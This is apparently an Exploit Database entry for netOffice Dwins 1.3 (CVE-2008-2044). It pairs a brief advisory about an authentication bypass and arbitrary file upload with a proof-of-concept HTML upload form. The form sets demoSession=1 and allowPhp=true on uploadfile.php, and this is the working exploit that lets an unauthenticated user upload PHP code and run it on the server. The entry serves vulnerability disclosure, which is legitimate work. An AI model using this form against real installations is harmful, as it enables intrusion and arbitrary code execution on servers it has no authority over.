NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload

Author: RawSecurity.org
type: webapps
platform: php
port: 
date_added: 2008-02-29 
date_updated: 2014-01-31 
verified: 1 
codes: CVE-2008-2044;OSVDB-42483 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/28051/info

netOffice Dwins is prone to a vulnerability that allows attackers to bypass authentication as well as a vulnerability that allows attackers to upload arbitrary files. These issues occur because the application fails to adequately sanitize user-supplied input.

Attackers can leverage these issues to gain unauthorized access to the application and to execute arbitrary code in the context of the application.

These issues affect Dwins 1.3 p2; other versions may also be affected.

<form accept-charset="UNKNOWN" method="POST" action="http://www.example.com/netoffice/projects_site/uploadfile.php?demoSession=1&allowPhp=true&action=add&project=&task=#filedetailsAnchor" name="feeedback" enctype="multipart/form-data"> <input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input type="hidden" name="maxCustom" value=""> <table cellpadding="3" cellspacing="0" border="0"> <tr><th colspan="2">Upload Form</th></tr> <tr><th>Comments :</th><td><textarea cols="60" name="commentsField" rows="6">&lt;/textarea&gt;</td></tr> <tr><th>Upload :</th><td><input size="35" value="" name="upload" type="file"></td></tr> <tr><th>&nbsp;</th><td><input name="submit" type="submit" value="Save"><br><br></td></tr></table> </form>